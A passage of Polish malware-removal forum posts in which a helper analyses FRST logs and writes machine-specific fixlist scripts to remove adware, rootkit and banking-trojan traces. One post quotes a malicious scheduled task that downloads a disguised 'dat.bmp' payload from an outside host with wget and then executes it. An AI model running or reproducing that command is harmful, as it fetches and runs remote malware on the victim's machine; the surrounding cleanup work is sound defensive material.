System32\Tasks\{B696C274-90C6-44F1-B7A1-B0C240800631} => Firefox.exe http://ui.skype.com/ui/0/6.0.0.126/pl/abandoninstall?page=tsProgressBar Task: {E7ECB289-5FD7-40E8-BCB9-440937704220} - System32\Tasks\{81A7B6CF-65DD-4029-9D27-01C43FE8F6C7} => pcalua.exe -a F:\TL-WN722N\QSS-722.exe -d F:\TL-WN722N Task: {F715FF60-032F-464E-98A9-6E369646F3CF} - System32\Tasks\{983FAF59-1059-47FC-B6E3-456798541854} => pcalua.exe -a "D:\Gry\c&c 3\CNC3.exe" -d "D:\Gry\c&c 3" C:\ProgramData\TEMP C:\Users\Mikus\AppData\Local\Temp*.html C:\Users\Mikus\AppData\Roaming\WebTest Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 5. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Adware jest zainstalowane w obu przeglądarkach indywidualnie (każda musi być czyszczona z osobna). Ponadto adware przekonwertowało Google Chrome z wersji "stabilnej" do "development" (brak limitacji instalacji rozszerzeń) i będzie wymagana kompleksowa reinstalacja tej szczególnej przeglądarki. Dodatkowo, w raporcie stoją amerykańskie serwery DNS pobierane z routera, a widzę Cię pod polskim IP na forum, co sugeruje także infekcję routera. Tcpip\Parameters: [DhcpNameServer] 148.53.81.2 148.53.130.1 148.53.46.62 Wdróż następujące operacje: 1. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. 2. Odinstaluj zdefektowane Google Chrome oraz zbędny Akamai NetSession Interface. Przy deinstalacji Chrome zaznacz Usuń także dane przeglądarki. Resztę dokończy mój skrypt w punkcie 3. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 4. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com SearchScopes: HKU\S-1-5-21-2371548481-2500731307-350997382-1000 -> DefaultScope {410CE52B-292E-4130-8FC8-25C25CE3AE78} URL = SearchScopes: HKU\S-1-5-21-2371548481-2500731307-350997382-1000 -> {410CE52B-292E-4130-8FC8-25C25CE3AE78} URL = SearchScopes: HKU\S-1-5-21-29074177-2114273088-3454551869-225919 -> {6A95B20D-AC62-429B-80C4-8F7230A453FE} URL = S3 MBAMSwissArmy; \??\C:\Windows\system32\drivers\MBAMSwissArmy.sys [X] HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="" C:\Program Files (x86)\BuyuNssaeve C:\Program Files (x86)\Google C:\Program Files (x86)\Smart Coupon C:\Program Files (x86)\YeoutubeAdBlocke C:\ProgramData\honnbmlkkhbafkhachmeccikobmajggh C:\Users\dkoloszc\AppData\Local\Google C:\Users\dkoloszc\AppData\Roaming\eCyber Reg: reg delete HKCU\Software\Google /f Reg: reg delete HKLM\SOFTWARE\Google /f Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Google /f Reg: reg delete "HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A95B20D-AC62-429B-80C4-8F7230A453FE}" /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg query HKLM\SYSTEM\CurrentControlSet\Services\Dell.PowerManager.Service /s EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 5. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. 6. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Przeklej dokładnie z raportu antywirusa jak jest sformułowana detekcja (konkretna ścieżka dostępu i nazwa zagrożenia). Czy przypadkiem nie chodzi o folder SkypEmoticons? Taki widać w logu, jest to adware a nie część Skype. Natomiast w logach widać też inne odpadki adware oraz czynną infekcję - wariant VBKlip/Banatrix uruchamiany za pomocą Harmonogramu zadań: Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Przeprowadź następujące operacje: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction Task: {2AA368BC-A77B-47EB-9ABD-5CEC742BDC74} - System32\Tasks\{A78CDB68-B25E-4572-9104-03E726D960DC} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7\Acpi Task: {8DF6F1AC-6266-46C0-A0E5-736B5F75AC67} - System32\Tasks\DriverEasy Scheduled Scan => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe Task: {AB6E172A-57D0-48B0-98D6-96DBF75A66D8} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://blockchainin.in/dat.bmp?data=or8cRVRHP2e7DIJ0FtvF;DrivGen;1419712785 & start cmd /R dat.bmp Task: {B03FE938-B0E5-4E6E-AC8C-DCBDAE9AFE2E} - System32\Tasks\{FACA796A-C22B-4C08-8837-473AAF64DABD} => pcalua.exe -a C:\Users\Maciej\Downloads\ACPI32_64_Win7\AsusSetup.exe -d C:\Users\Maciej\Downloads\ACPI32_64_Win7 Task: C:\Windows\Tasks\DriverEasy Scheduled Scan.job => C:\Program Files\Easeware\DriverEasy\DriverEasy.exe HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = www.google.com HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = www.google.com C:\Program Files\Probit Software C:\Program Files\unisaLees C:\ProgramData\dat.bmp C:\ProgramData\wget.exe C:\ProgramData\17691939238860040889 C:\ProgramData\ikgndmebaegbafjaefkbgapbcookdmol C:\ProgramData\APN C:\ProgramData\EpicScale C:\Users\Maciej\AppData\Roaming\Easeware C:\Users\Maciej\AppData\Roaming\SkypEmoticons EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Brakuje pliku FRST Shortcut. W Google Chrome jest wszczepione adware Unuisaloes. 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction CustomCLSID: HKU\S-1-5-21-2017020554-2505807170-1683698369-1005_Classes\CLSID\{F28C2F70-47DE-4EA5-8F6D-7D1476CD1EF5}\localserver32 -> C:\DOCUME~1\Agata\USTAWI~1\Temp\dc1F7d5B5\temp\Ukraine Crisis_ Death and destruction continues in Ea (the data entry has 45 more characters). S2 24c54e38; "C:\WINDOWS\system32\rundll32.exe" "c:\Program Files\DeltaFix\DeltaFix.dll",serv S3 ALSysIO; \??\C:\DOCUME~1\Agata\USTAWI~1\Temp\ALSysIO.sys [X] S3 Tosrfcom; No ImagePath S3 TpChoice; system32\DRIVERS\TpChoice.sys [X] C:\Documents and Settings\All Users\Dane aplikacji\pbphckkhomkgbgpgcgpkpncmdmkfkbnk C:\Documents and Settings\Agata\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Preferences C:\Documents and Settings\Agata\Ustawienia lokalne\Dane aplikacji\Google\Chrome\User Data\Default\Local Storage\*localstorage* C:\Program Files\YOutUbeAAdBlOcke C:\Program Files\uNisaliees C:\Program Files\Unuisaloes Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{24c54e38} /f Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. W Google Chrome: Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Zresetuj ustawienia przeglądarki. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Wyszukiwanie > klik w Zarządzanie wyszukiwarkami > skasuj z listy niedomyślne śmieci (o ile będą). Zresetuj cache wtyczek. W pasku adresów wpisz chrome://plugins i ENTER. Na liście wtyczek wybierz dowolną i kliknij Wyłącz. Następnie wtyczkę ponownie Włącz. 3. Zrób nowy log FRST z opcji Scan (bez Addition, ale zaznacz Shortcut). Dołącz też plik fixlog.txt.

Temat przenoszę do działu Windows 8. Nie jest to problem infekcji. Moim zdaniem to nie Opera jest bezpośrednią przyczyną. W raportach jako pierwszy podejrzany dla opisywanych efektów jawi się Kaspersky Anti-Virus (silna inwazja w systemie, intercepcja procesów).

Posty dla porządku łączę, a temat przenoszę do działu Windows XP. Nie jest to problem infekcji. 1. W Dzienniku zdarzeń jest błąd charakterystyczny dla zdegradowanego transferu dysku z DMA do PIO: System errors: ============= Error: (01/04/2015 09:16:55 PM) (Source: 0) (EventID: 9) (User: ) Description: \Device\Ide\IdePort0 Rozpocznij od wykonania instrukcji rozpisanej w ustępie Skutki uboczne skanu GMER (dyski w trybie IDE, głównie system XP): KLIK. 2. Gdy naprawisz transfer dysku: - Zastosuj narzędzie SPTDinst, by się pozbyć tego sterownika. - Posługując się Autoruns w karcie Drivers skasuj wpisy określone jako "not found". - Odinstaluj starą wersję Avast (8.0.1497.0) i zastąp najnowszą (2015.10.0.2208): KLIK. - Zaktualizuj systemowy Internet Explorer do wersji IE8. Link w przyklejonym: KLIK. 3. Po wszystkim zrób nowy log FRST z opcji Scan (bez Addition i Shortcut) i opisz co się dzieje.

Brakuje trzeciego pliku FRST Shortcut. YAC to podejrzany program, od którego należy trzymać się z daleka. Przeczytaj moją wypowiedź tutaj: KLIK. Na czas wszystkich operacji wyłącz COMODO, gdyż może zablokować akcje (z pewnością nie pozwoli przetworzyć w całości skryptu FRST): 1. Przez Panel sterowania odinstaluj: - Adware i wątpliwy skaner: LiveVDO, VshareComplete, RegClean Pro, YAC(Yet Another Cleaner!). - Stare dziurawe wersje: Adobe Flash Player 10 ActiveX, Adobe Flash Player 15 Plugin, Adobe Reader X (10.1.12) - Polish, Gadu-Gadu 10, Java 7 Update 25, OpenOffice.org 3.2 (ten ostatni nie umie korzystać z najnowszych Java i wymagana instalacja najnowszej wersji pakietu 4.x) oraz zbędnik COMODO GeekBuddy. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: CHR HKLM\SOFTWARE\Policies\Google: Policy restriction HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120141223 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120141223 HKU\S-1-5-21-3948689686-701338284-1942790856-1000\Software\Microsoft\Internet Explorer\Main,Start Page = www.wp.pl/?src01=dp120141223 SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = ${SEARCH_URL}{searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = ${SEARCH_URL}{searchTerms} SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> DefaultScope {8EEAC88A-079B-4b2c-80C1-7836F79EB40A} URL = http://pl.search.yahoo.com/search?p={searchTerms}&fr=chr-comodo SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://startsear.ch/?src=sp&aff=51&cf=2b2a1120-1f77-11e1-92ca-e0cb4e49e9d8&q={searchTerms} SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> {6424EBC6-FF28-456C-B234-4F3B05A9C433} URL = http://startsear.ch/?aff=1&src=sp&cf=2b2a1120-1f77-11e1-92ca-e0cb4e49e9d8&q={searchTerms} SearchScopes: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> {8EEAC88A-079B-4b2c-80C1-7836F79EB40A} URL = http://pl.search.yahoo.com/search?p={searchTerms}&fr=chr-comodo BHO-x32: No Name -> {cbfb5c65-652c-3e10-9d9a-e586816d9342} -> No File Toolbar: HKU\S-1-5-21-3948689686-701338284-1942790856-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File Task: {669DCF2F-E074-4F10-B12E-2BA69EC45636} - \RegClean Pro No Task File Task: {BE6F370A-2822-4692-BA44-3246E748166C} - System32\Tasks\{05F53984-5AC4-42FD-BFF9-4BF874278055} => pcalua.exe -a "C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe" HKU\S-1-5-21-3948689686-701338284-1942790856-1000\Software\Classes\.exe: => S3 ALSysIO; \??\C:\Users\user\AppData\Local\Temp\ALSysIO64.sys [X] S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X] S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X] S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X] S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X] S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X] S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X] C:\Program Files (x86)\Elex-tech C:\Program Files (x86)\LiveVDO plugin C:\Program Files (x86)\Mozilla Firefox\extensions C:\Program Files (x86)\Mozilla Firefox\plugins C:\Users\user\AppData\Roaming\eCyber C:\Users\user\AppData\Roaming\Elex-tech C:\Users\user\Downloads\yet_another_cleaner_bbs.exe Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f Reg: reg delete HKCU\Software\Google\Chrome /f Reg: reg delete HKLM\SOFTWARE\Google\Chrome /f Reg: reg delete "HKLM\SOFTWARE\mozilla\Mozilla Firefox 3.6.8" /f Reg: reg delete "HKLM\SOFTWARE\mozilla\Mozilla Firefox 18.0" /f Reg: reg delete "HKLM\SOFTWARE\mozilla\Mozilla Firefox 33.0.1" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox z adware: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone, ale rozszerzenie Adblock Plus trzeba będzie przeinstalować. 4. Zrób nowy log FRST z opcji Scan, zaznacz pole Shortcut, by powstały dwa logi. Dołącz też plik fixlog.txt.

ComboFix to tu nie pomógł, podane logi definitywnie pochodzą z okresu już po jego uruchomieniu, a w systemie nadal jest aktywne adware (prócz tego co powiedziane, także adware "Better Finder" w Firefox). Przyczyna nabycia adware to pobieranie z portali przy użyciu "downloaderów": KLIK. Tu jeden z plików który doprowadził do zagnieżdżenia się większości obiektów: 2015-01-01 16:51 - 2015-01-01 16:51 - 00708320 _____ (komputerswiat.pl) C:\Users\Agnieszka\Downloads\All CPU Meter 4.7.3.exe Przeprowadź następujące działania: 1. Przez Panel sterowania odinstaluj adware Click Caption 1.10.0.5 oraz starą wersję Adobe Flash Player 15 ActiveX. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: S2 WindowsMangerProtect; C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe [473088 2015-01-01] (Fuyu LIMITED) [File not signed] R3 ALSysIO; \??\C:\Users\AGNIES~1\AppData\Local\Temp\ALSysIO.sys [X] R3 catchme; \??\C:\Users\AGNIES~1\AppData\Local\Temp\catchme.sys [X] U3 mbr; \??\C:\ComboFix\mbr.sys [X] Task: {81A20564-DCD9-4860-8CA3-197BD1DD1AD8} - System32\Tasks\Core Temp Autostart Agnieszka => C:\Users\AGNIES~1\AppData\Local\Temp\Rar$EX00.451\Core Temp.exe HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKU\S-1-5-21-1399684949-1430651134-2058239177-1004\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKU\S-1-5-21-1399684949-1430651134-2058239177-1004\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch BHO: File Sanitizer for HP ProtectTools -> {3134413B-49B4-425C-98A5-893C1F195601} -> C:\Program Files\Hewlett-Packard\File Sanitizer\IEBHO.dll No File FF HKLM\...\Firefox\Extensions: [otis@digitalpersona.com] - C:\Program Files\Hewlett-Packard\HP ProtectTools Security Manager\Bin\FirefoxExt C:\Program Files\ClickCaption_1.10.0.5 C:\Program Files\Opera C:\ProgramData\WindowsMangerProtect C:\Users\Agnieszka\AppData\Local\Opera Software C:\Users\Agnieszka\AppData\Roaming\Opera Software C:\Users\Agnieszka\AppData\Roaming\omiga-plus C:\Users\Agnieszka\AppData\Roaming\WebTest C:\Users\Agnieszka\Downloads\All CPU Meter 4.7.3.exe C:\Users\Agnieszka\Downloads\installspeedfan445_[www.programosy.pl].exe C:\Users\Agnieszka\Downloads\installspeedfan437.exe C:\Users\Agnieszka\Downloads\pobierz-instsf450.exe C:\Users\jape\Desktop\Continue SpeedFan installation.lnk C:\Users\jape\Downloads\*(*)-dp*.exe C:\Users\jape\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\jape\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\KACPER\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main" /f Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main" /f EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Wyczyść Firefox: menu Pomoc > Informacje dla pomocy technicznej > Zresetuj program Firefox. Zakładki i hasła nie zostaną naruszone. 4. W systemie są aż trzy konta: ========================= Accounts: ========================== Agnieszka (S-1-5-21-1399684949-1430651134-2058239177-1004 - Administrator - Enabled) => C:\Users\Agnieszka jape (S-1-5-21-1399684949-1430651134-2058239177-1000 - Administrator - Enabled) => C:\Users\jape KACPER (S-1-5-21-1399684949-1430651134-2058239177-1005 - Limited - Enabled) => C:\Users\KACPER Każde musi zostać sprawdzone z osobna. Zaloguj się po kolei na każde poprzez pełny restart komputera (a nie "Wyloguj" czy "Przełącz użytkownika") i zrób na każdym zestaw logów FRST (główny + Addition, ale bez Shortcut). Na koncie limitowanym KACPER uruchom FRST poprzez dwuklik a nie "Uruchom jako Administrator" (zmieni się kontekst konta). Dołącz też plik fixlog.txt.

Przeprowadź następujące działania: 1. Otwórz Notatnik i wklej w nim: CloseProcesses: CreateRestorePoint: R1 {abbda6e4-1fdf-45e9-8feb-7ffcdf19a253}Gw64; C:\Windows\System32\drivers\{abbda6e4-1fdf-45e9-8feb-7ffcdf19a253}Gw64.sys [48784 2014-12-26] (StdLib) R3 SPBIUpdd; C:\Program Files\Common Files\ShopperPro\spbiw.sys [41856 2014-12-25] () R2 SPBIUpd; C:\Program Files\Common Files\ShopperPro\spbiu.exe [2346880 2014-12-25] (ShopperPro) S2 Update SourceApp; "C:\Program Files (x86)\SourceApp\updateSourceApp.exe" [X] Task: {091DA62D-6D95-41FA-B7AF-2023BAA7FF6C} - System32\Tasks\ShopperProJSUpd => C:\Program Files (x86)\ShopperPro\updater.exe [2014-12-25] (Goobzo) Task: {2E1B38AA-EB1F-4DDC-B90E-B49BA82DEE75} - System32\Tasks\Installer_iwebar => C:\Users\Dominik\AppData\Local\Installer\Installiwebar_9105\ins_postInst.exe [2014-12-27] () Task: {65BB00BC-E915-4588-8CE1-6880A2AF36D8} - System32\Tasks\ShopperPro => C:\Program Files (x86)\ShopperPro\ShopperPro.exe [2014-12-25] (Goobzo LTD) Task: {9EA83927-78C0-4784-B7EB-74108A37C015} - System32\Tasks\SPBIW_UpdateTask_Time_3830363134393637372d45552a6c505a41574a415734 => Wscript.exe //B "C:\ProgramData\ShopperPro\spbihe.js" spbiu.exe /invoke /f:check_services /l:0 Task: {B3CC3158-245C-4596-A52B-109AE2470534} - System32\Tasks\Installer_sense => C:\Users\Dominik\AppData\Local\Installer\Installsense_24577\ins_postInst.exe [2014-12-27] () HKLM\...\Run: [Launch LCDMon] => "C:\Program Files\Common Files\Logitech\LCD Manager\lcdmon.exe" HKLM-x32\...\Run: [] => [X] GroupPolicy: Group Policy on Chrome detected CHR HKLM\SOFTWARE\Policies\Google: Policy restriction BHO: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro64.dll (Goobzo Ltd.) BHO: No Name -> {FCE3FA8B-BA81-467C-81D8-E43C00D1BC71} -> No File BHO-x32: Shopper Pro -> {A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C} -> C:\ProgramData\ShopperPro\ShopperPro.dll (Goobzo Ltd.) FF HKLM-x32\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 FF HKU\S-1-5-21-361420388-1239155411-725962489-1000\...\Firefox\Extensions: [smartwebprinting@hp.com] - C:\Program Files (x86)\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 C:\Program Files\Common Files\ShopperPro C:\Program Files (x86)\ShopperPro C:\ProgramData\ShopperPro C:\ProgramData\Temp C:\Users\Dominik\AppData\Local\Installer C:\Users\Dominik\Desktop\Programy\DAEMON Tools Lite.lnk C:\Users\Public\Documents\ShopperPro C:\Windows\System32\drivers\{abbda6e4-1fdf-45e9-8feb-7ffcdf19a253}Gw64.sys Reg: reg delete HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ShopperPro /f Reg: reg query "HKLM\SOFTWARE\Clients\StartMenuInternet\OperaStable\shell\open\command" /s Folder: C:\Users\Dominik\AppData\Roaming\Opera Software\Opera Stable\Extensions CMD: type "C:\Users\Dominik\AppData\Roaming\Opera Software\Opera Stable\Preferences" EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt i umieść obok narzędzia FRST. Uruchom FRST i kliknij w Fix. Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Scan (bez Addition i Shortcut). Dołącz też plik fixlog.txt.

Spodziewałam się tego patrząc na podejrzany wyciąg z GMER. Tu nie tylko jest infekcja sterownika serial.sys (modyfikacja ZeroAccess), ale także bootkit - Rootkit.Boot.Cidox.B. Działania wstępne: Z POZIOMU TRYBU AWARYJNEGO: 1. Uruchom TDSSKiller ponownie, jednak tym razem pozostaw wszystkie akcje domyślnie ustawione przez narzędzie i pozwól przeprowadzić leczenie. Zresetuj komputer. 2. Otwórz Notatnik i wklej w nim: CloseProcesses: (Microsoft Corporation) C:\Windows\explorer.exe CreateRestorePoint: DeleteJunctionsInDirectory: C:\WINDOWS\$NtUninstallKB34492$ ShellIconOverlayIdentifiers: [1SecureIconsProvider] -> {FC9D8189-520A-4417-AED7-9EAC810C6FBA} => C:\Documents and Settings\All Users\Dane aplikacji\Microsoft\Secure\Icons\SecureIconsProvider.dll () HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [Otsics] => C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Otsics\tmpD2.exe [145256 2014-10-24] () HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [Ektion] => regsvr32.exe "C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Ektion\kbdcomex54.dll" HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [YjPack] => C:\WINDOWS\system32\regsvr32.exe "C:\Documents and Settings\Jarek\Ustawienia lokalne\Dane aplikacji\Otsics\AcroIEHelperShim.DLL" HKU\S-1-5-21-1417001333-746137067-839522115-1004\...\Run: [ChromeUpdate] => C:\Documents and Settings\Jarek\Dane aplikacji\FrameworkUpdate\ChromeUpdate.exe [233984 2014-11-26] (Company name goes here) Winlogon\Notify\klogon: C:\WINDOWS\system32\klogon.dll (Kaspersky Lab) BootExecute: autocheck autochk /k:C * S2 SecurityCenterServer4196545509; "C:\WINDOWS\system32\deurge.exe" -service "C:\Documents and Settings\Jarek\Dane aplikacji\Aguhxyro\googy.exe" S2 ASInsHelp; \??\C:\WINDOWS\system32\drivers\AsInsHelp32.sys [X] U3 awdw3w0e; No ImagePath S0 Chl27; No ImagePath S3 ddxgb; \??\C:\DOCUME~1\Jarek\USTAWI~1\Temp\ddxgb.sys [X] S0 Hmq51; No ImagePath S4 sptd; \SystemRoot\System32\Drivers\sptd.sys [X] S3 Video3D; No ImagePath HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Chl27.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Hmq51.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Chl27.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hmq51.sys => ""="Driver" Winsock: Catalog5 01 mswsock.dll File Not found () ATTENTION: The LibraryPath should be "%SystemRoot%\System32\mswsock.dll" Winsock: Catalog5 03 mswsock.dll File Not 